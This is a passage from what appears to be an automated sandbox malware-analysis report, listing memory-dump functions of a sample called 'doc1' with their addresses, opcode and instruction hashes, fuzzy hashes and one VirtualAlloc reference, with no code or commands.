                            • Opcode Fuzzy Hash: 55ceecd9f601d5f3d1bd59f1b934f5762839aa6c23d47c01cc2d6419e84bd56d
                            • Instruction Fuzzy Hash: 587116B4D05219CFCF18DFA5D584AEDBBF2FB88300F24802AD815AB254D7349A86EB50
                            Function 05818FCD Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 163803d2a4e12dbf158e3880e133adae75040e4504891964e697926d7a498419
                            • Instruction ID: 9cde9e32f5b285b976ace8a3a4b7e0571166634a43b2d99cdb6378b6223630a3
                            • Opcode Fuzzy Hash: 163803d2a4e12dbf158e3880e133adae75040e4504891964e697926d7a498419
                            • Instruction Fuzzy Hash: 70710474A01218CFDB54EF68D854BAEB7B6FF89300F1094A9D91AA7398DB305D85CF41
                            Function 05818F73 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: afc8ab450782dc7bee954c83fea6c07b15227454372fbe4bcae579eeb2ae4b07
                            • Instruction ID: 9a6895f7274862ce02ae54fe788a70b4d969466fff36a243fc2b4a018eb84594
                            • Opcode Fuzzy Hash: afc8ab450782dc7bee954c83fea6c07b15227454372fbe4bcae579eeb2ae4b07
                            • Instruction Fuzzy Hash: F6715574A01218CFDB14EF68D854BAEB7B6FF89300F1094A9D91AA7398DB305D85CF01
                            Function 05818FBD Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: f1a4a8a448bbb477e75f8e56c44a839337c07dce66fe3e08d7fadfcf0fffae20
                            • Instruction ID: b9ce890293986728f8286ff4da380d93bb6abfbc4007d2d5ce7b193fad5f51af
                            • Opcode Fuzzy Hash: f1a4a8a448bbb477e75f8e56c44a839337c07dce66fe3e08d7fadfcf0fffae20
                            • Instruction Fuzzy Hash: 83612474A01218CFDB14EF68D854BAEBBB6FF89300F1094A9D91AA7398DB305D85CF45
                            Function 0106D450 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 654d751f832a4ee63450edee94bf4026114293b68ff02579be6a726e50832dc4
                            • Instruction ID: 96285f6fca008d73648248921d0ada677af9feca6b5cdb44369fe772c9d8297c
                            • Opcode Fuzzy Hash: 654d751f832a4ee63450edee94bf4026114293b68ff02579be6a726e50832dc4
                            • Instruction Fuzzy Hash: AC51C0B4E01218DFDB18DFA9D488AEDBBF6FF88310F108069E455A7264DB35A981CF50
                            Function 0576E511 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: acea142ddb19e228e73bf79e1b1854466e4d1f34b5e8c5efd6868377db13a470
                            • Instruction ID: 31d84b0613e51d49fbe3c05c2e9c2d84635c61ea6d06b7614e8604e4387eddaf
                            • Opcode Fuzzy Hash: acea142ddb19e228e73bf79e1b1854466e4d1f34b5e8c5efd6868377db13a470
                            • Instruction Fuzzy Hash: C5410778D05208DFDB00CFAAD854BEEBBF6FB89300F108065D815A7295E7749985CF61
                            Function 0580E658 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0580E6F7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304289784.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5800000_doc1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 91363cbadb2efdb0f3729499aac70522a6010098b6e8987783fb025894e682aa
                            • Instruction ID: 38196a7b009bc57cefd57a68e9e60d0c555f2bdf4202c20b636fac6ad87daf1e
                            • Opcode Fuzzy Hash: 91363cbadb2efdb0f3729499aac70522a6010098b6e8987783fb025894e682aa
                            • Instruction Fuzzy Hash: FF31A8B8D05258EFDF10CFA9D880AAEFBB5BF49310F14942AE815B7210D735A945CF58
                            Function 0576DCE5 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 634ff2c8c2e0d84822897e320e2c93d8ff0925bb9f0498fcdfecfba6b404965a
                            • Instruction ID: 0224fbb0d7213fd0b95b1a78853f9b38afc067ae5249668db4a6ee20dd87ad80
                            • Opcode Fuzzy Hash: 634ff2c8c2e0d84822897e320e2c93d8ff0925bb9f0498fcdfecfba6b404965a
                            • Instruction Fuzzy Hash: 7B3150B4E14228CFDB24EFA9D854BADB7F2FF49304F108066D809AB258D7B09885DF01
                            Function 0576E520 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 9bc92719048e3a62c6e2c26ebb38d2dda70fa60a490080581d79ce27e5251dfd
                            • Instruction ID: ee718039ac44add3990aa3792d90dff16549297a16035649d6119e1446438392
                            • Opcode Fuzzy Hash: 9bc92719048e3a62c6e2c26ebb38d2dda70fa60a490080581d79ce27e5251dfd
                            • Instruction Fuzzy Hash: 22310678E04208DFDB04CFAAD844BEEBBF6FB89300F108065D815B7295E77499858F51
                            Function 01065762 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: f66641d3db2d208d4df86c7ad99ce925d0ca6cd334510447bc9bd176bf8b2f17
                            • Instruction ID: 5e4536841988d59983644a576eba7b9f39bf349ae5d63b3f1a43e063c0048646
                            • Opcode Fuzzy Hash: f66641d3db2d208d4df86c7ad99ce925d0ca6cd334510447bc9bd176bf8b2f17
                            • Instruction Fuzzy Hash: C2317A70D0A349CFD706DF68E8496AD7BF9FF46354F1480EAD044AB296E7384A85CB11
                            Function 01065798 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: a231cd8eda2c67524d5402ffd5af9fd1f8ca5d32d660764d3a12da3c8bdb4821
                            • Instruction ID: 97702438f861b4512910270188601aca912898d9814b2735657bebd6a549bbc9
                            • Opcode Fuzzy Hash: a231cd8eda2c67524d5402ffd5af9fd1f8ca5d32d660764d3a12da3c8bdb4821
                            • Instruction Fuzzy Hash: E3317CB0D05309DFDB05DFA9E8457ADBBF9FF89300F2091AAD015A7295E7384A85CB01
                            Function 010657A8 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 3cf51869297aad391c3dd744673e6fe27c4f2f2717026a08e92eb24a0b37384b
                            • Instruction ID: 1a3b2bf6c96b83687e196d4f8af15c6825af41e415abeeff0c77e05812227a94
                            • Opcode Fuzzy Hash: 3cf51869297aad391c3dd744673e6fe27c4f2f2717026a08e92eb24a0b37384b
                            • Instruction Fuzzy Hash: 283160B0D05209DFDB04EFA9E8457AEBBF9FF89340F2091A9D015A7284E7784A85CF41
                            Function 01069918 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: b8cf58919ce65c64a0d368971f75a6127a7e4d262b056d91e25326bca7766868
                            • Instruction ID: 7e9b6b7310374d7285a18f3e01750698f3d056efb116676192ed5e54f28d6a9f
                            • Opcode Fuzzy Hash: b8cf58919ce65c64a0d368971f75a6127a7e4d262b056d91e25326bca7766868
                            • Instruction Fuzzy Hash: 5F215A74D0020ACFDB04DFA9D8443EEBBFAFB89304F109425D519B3685DB754985CBA1
                            Function 0106F108 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 8dca02cca91ceec87860eab8a86293989d168eb21ae3f1ada9a2c4cdbb8fa96b
                            • Instruction ID: 4922c3b9c8e7a4aef23221126d2f5d556ae695b335c9b885e4a4e83a5337eec7
                            • Opcode Fuzzy Hash: 8dca02cca91ceec87860eab8a86293989d168eb21ae3f1ada9a2c4cdbb8fa96b
                            • Instruction Fuzzy Hash: D7214C71D0421ACFDB04CFAAE9242EEBBFAEB89350F10802AD415B7254D7754A85CFA1
                            Function 0581BDDD Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: (
                            • API String ID: 0-3887548279
                            • Opcode ID: dd1d9107faf182766c67b90e91191217d70733a9fce4fc9df38aafc1bb76d483
                            • Instruction ID: 42fae6a7cb79dae1983e43d514f815eae8d2991b4c9996349d13e0d81cfcd35b
                            • Opcode Fuzzy Hash: dd1d9107faf182766c67b90e91191217d70733a9fce4fc9df38aafc1bb76d483
                            • Instruction Fuzzy Hash: 1D215DB4902229CFDBA0DF24C888BE9BBB5BB49305F1085D9E81DA7251DB755EC5CF04
                            Function 0581B80A Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;
                            • API String ID: 0-1661535913
                            • Opcode ID: 381b34d9341105bb62b3e43701e7a1d38a500b1c06d6ae34f1ba0774b5f6f362
                            • Instruction ID: aa7b044cf03224ecfa0c308106200196b6402bf5bced526e8645a0c5892f2b57
                            • Opcode Fuzzy Hash: 381b34d9341105bb62b3e43701e7a1d38a500b1c06d6ae34f1ba0774b5f6f362
                            • Instruction Fuzzy Hash: 1A216A749022698FDBA5CF24C884BECBBB5AB49304F1485EAD80DA7250DB319EC5CF44
                            Function 05813061 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 74083a328378d33b67c6fc8d8691ef213ead1c285922d9cc5c0143c66f1f038d
                            • Instruction ID: f2a1b438bb13a5d08f1cffd619d7bc3ad91b5b75daae71c46644f18e248a4a92
                            • Opcode Fuzzy Hash: 74083a328378d33b67c6fc8d8691ef213ead1c285922d9cc5c0143c66f1f038d
                            • Instruction Fuzzy Hash: E5219074A01228CFDB64DF64D899B99B7B2FB88304F1081EAD54AA7394DB305EC5CF50
                            Function 0576E14F Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: f61587d5477256a2622b99c8f97d408a40eff2ff2c95a4f11834946ca6794a82
                            • Instruction ID: 92c7bbd0ed2a9192f371331398d5aa7f3e5964cea3ab357b15981115699dc034
                            • Opcode Fuzzy Hash: f61587d5477256a2622b99c8f97d408a40eff2ff2c95a4f11834946ca6794a82
                            • Instruction Fuzzy Hash: 6A21E474A01318DFDB64EF24D894B9AB7B2FB89300F1051A9E409A7398DB359DC5CF42
                            Function 0576DA86 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: a88661848eb1d131bf8de988b1171ac6b5816c27b130a932a18fd6cfde885f02
                            • Instruction ID: af13e5840072d6d660437259e5f9435f06d7c1203b90273a67625fdfad7f174a
                            • Opcode Fuzzy Hash: a88661848eb1d131bf8de988b1171ac6b5816c27b130a932a18fd6cfde885f02
                            • Instruction Fuzzy Hash: 4A110674A19108CFEB24DF75D891BADB7B6FB89300F1495AA940AB7295DB305E81CF00
                            Function 0576DACA Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: fdc524785e935e74f89cb9c9c5d47fe50e75f7b914b7c5a647127cc59a0e9922
                            • Instruction ID: 5dafb5136e0574fb4482f8b48773dee59dfcb665ec88611728806b621c05518a
                            • Opcode Fuzzy Hash: fdc524785e935e74f89cb9c9c5d47fe50e75f7b914b7c5a647127cc59a0e9922
                            • Instruction Fuzzy Hash: A2110370E15219CFEB24DF29D891BADB7B2FB89300F0494AAC40AB7295DB705D80CF00
                            Function 05A80FC9 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304800385.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5a80000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 22aa99a611475a3352d6de89532b6522e9cdd426cc7189f3071818a2ef528171
                            • Instruction ID: b6170c4d7ac4f5c2c2e85672666ded5771deb0895230d8b31e7d7b00ca887211
                            • Opcode Fuzzy Hash: 22aa99a611475a3352d6de89532b6522e9cdd426cc7189f3071818a2ef528171
                            • Instruction Fuzzy Hash: 5E217274A056298FDBA4DF28D888BAAB7B1BB49311F1054E6D419A7794DB309EC4CF01
                            Function 0581BC5A Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: 0bd359313d8adc6b163d6fd626cf7f5941f3131c4aa0004e9decad402c161f77
                            • Instruction ID: 787a24920a934151cd9b11a987cd6d44c1cb4aa4973c8b5537b3809410efee7f
                            • Opcode Fuzzy Hash: 0bd359313d8adc6b163d6fd626cf7f5941f3131c4aa0004e9decad402c161f77
                            • Instruction Fuzzy Hash: 9811C2B4901218CFDB68CF28C889BE8B7F2BB84305F1084A9D80DA7291D7745EC6CF44
                            Function 01060B67 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: @U
                            • API String ID: 0-372357663
                            • Opcode ID: aa7eb4267fef853a8e2d3f932170f0488017c9a16e507774130abe7d17fcc157
                            • Instruction ID: 6d20dfd9e728fdc0186fa5c6694f1f5a1ad1e7dd4d10379ade18054b65e93378
                            • Opcode Fuzzy Hash: aa7eb4267fef853a8e2d3f932170f0488017c9a16e507774130abe7d17fcc157
                            • Instruction Fuzzy Hash: 56F0B430240308CFC746EF78E450A687BE9EBCA390B1491A8E1459B2A6EA24DD458B91
                            Function 058163AF Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 5d06269c80999492d24c9e155b87cd106024dffeca14298d2daed7b77c85cca4
                            • Instruction ID: 83cbdc4b387d1ff856b7008f6b072c8782b5d25024eaf35486ebd5d6d665a41c
                            • Opcode Fuzzy Hash: 5d06269c80999492d24c9e155b87cd106024dffeca14298d2daed7b77c85cca4
                            • Instruction Fuzzy Hash: 3AF0C970D05219CFEB64CF65D844BA8B7B6FB85304F10C0A6D949E7298DB744E85CF54
                            Function 0581BBB0 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: +
                            • API String ID: 0-2126386893
                            • Opcode ID: 7e0d35d54d6db512a837f7f19b5dbfbc01308134aecbb6cf601d69d1f4c45309
                            • Instruction ID: 06737bad08364d88775692a654f45ed9202ac1a98eb1e319658096e9152211fa
                            • Opcode Fuzzy Hash: 7e0d35d54d6db512a837f7f19b5dbfbc01308134aecbb6cf601d69d1f4c45309
                            • Instruction Fuzzy Hash: 16019DB49062299FDBA4DF24DD54BDDBBB1AB49300F0080E9E989B7290DA705ED0CF04
                            Function 0576DA0C Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: e18095f210565ce00713df631b7c80d0c60316df6c1df04062c465c5163a3cad
                            • Instruction ID: 4492e53593c4d37a5c665076b7afd9c354bec81e72e5728540630dd370295e32
                            • Opcode Fuzzy Hash: e18095f210565ce00713df631b7c80d0c60316df6c1df04062c465c5163a3cad
                            • Instruction Fuzzy Hash: 44011974A00208CFCB20DF29E4857DDB7B2EB8A310F1090A5E44AA3285CB305DC58F82
                            Function 0581CBA5 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3916222277
                            • Opcode ID: 6ff6cd44c5b3ba1118cffda6bc2b9dea652f583ec07fcf0f2f4a5c0412ad393e
                            • Instruction ID: 13ad9bfdfab21a5d04e7263ef5a04e0bacaef9ff4f04ca2c9c9e92e5320d9b69
                            • Opcode Fuzzy Hash: 6ff6cd44c5b3ba1118cffda6bc2b9dea652f583ec07fcf0f2f4a5c0412ad393e
                            • Instruction Fuzzy Hash: 4CF0B77694021DDFEF20CF50CD41FD9B7B9BB08304F1081DAA519A7281D6319B85DF14
                            Function 0576D7D8 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 429283e4d3a256950856dd938b44876c23230da10849b6159bf08da82a2492b3
                            • Instruction ID: 91e06d2d9600505c5f5fa47dd671796ba573a03505f8526f7a9371e3a22eaae7
                            • Opcode Fuzzy Hash: 429283e4d3a256950856dd938b44876c23230da10849b6159bf08da82a2492b3
                            • Instruction Fuzzy Hash: FAF03774A14208CFDB64DF24D486BEDBBB2FB48310F1044A9E909A3285CB705EC0CF42
                            Function 0576D857 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: f4d62540d071bc010b0a60657c805f663afc57a16406a2fe5fb954e644f7fdc8
                            • Instruction ID: a4b929151b17b98bf21ec3da43f869c77b58663c3a3f9041359b75011a5c35ba
                            • Opcode Fuzzy Hash: f4d62540d071bc010b0a60657c805f663afc57a16406a2fe5fb954e644f7fdc8
                            • Instruction Fuzzy Hash: 54F04974A11208CFDB24DF68D494B9C77F1FB49310F1040A5E509A7384C7319E80CF52
                            Function 0576E007 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: c0609da3ce631428afc245951884e6f1ff8dead06d5c5a51c3adce78fec8e748
                            • Instruction ID: c5c9edc026df137097b905b4d48af4ec7d93a65e42bde670d823e4a5ffdb41e8
                            • Opcode Fuzzy Hash: c0609da3ce631428afc245951884e6f1ff8dead06d5c5a51c3adce78fec8e748
                            • Instruction Fuzzy Hash: 09F03774A01208DFDB20DF64D5957ED77B2EB84310F1000A9E509A7391C7356EC4CF02
                            Function 0576E0DB Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: b5c4ea5abb44e048de8c9746a062bd5bcba3867ffc464ed8f9fd655b2ce0175e
                            • Instruction ID: 12e004cad619d6b6ace0da4a46745579b13c941f3a0beb02684c019daa9c1c36
                            • Opcode Fuzzy Hash: b5c4ea5abb44e048de8c9746a062bd5bcba3867ffc464ed8f9fd655b2ce0175e
                            • Instruction Fuzzy Hash: 3EF0B278A04248CFDBA0DF54E895BADBBB6EB85311F2050A5E409B7394CB3169C5CF42
                            Function 0576D8CC Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: a6d8be296be70e8512739d4b9a8e221e6aa56d8c9133744a736212c12e32cc67
                            • Instruction ID: 278a9024831784f71f47acb0c84fa6d52b9a19b008fba14638e880d2689b5831
                            • Opcode Fuzzy Hash: a6d8be296be70e8512739d4b9a8e221e6aa56d8c9133744a736212c12e32cc67
                            • Instruction Fuzzy Hash: A7F01474A00208CFEB20DF58E894B9DBBB5FB89310F2040A9E809A7285C7309980CF52
                            Function 05815E8B Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 4b39d32372c8e6d654a629287e3c080ce15bb99429240e6d2305dbdb01fa9c28
                            • Instruction ID: e856661f67fd8bb20ccbe2b1bb2e20586535149324fe7d6453bba4868e1e44e8
                            • Opcode Fuzzy Hash: 4b39d32372c8e6d654a629287e3c080ce15bb99429240e6d2305dbdb01fa9c28
                            • Instruction Fuzzy Hash: 08F03A70905119CFEB64CF66D840BA8BBB6FB88300F10C0E6D949E3298DB304E80CF04
                            Function 0581B5DF Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: +
                            • API String ID: 0-2126386893
                            • Opcode ID: 9c0115eaf1c0de2737f43be7de51e201807cf33ef8a69f5a8c922e3fa9241d3a
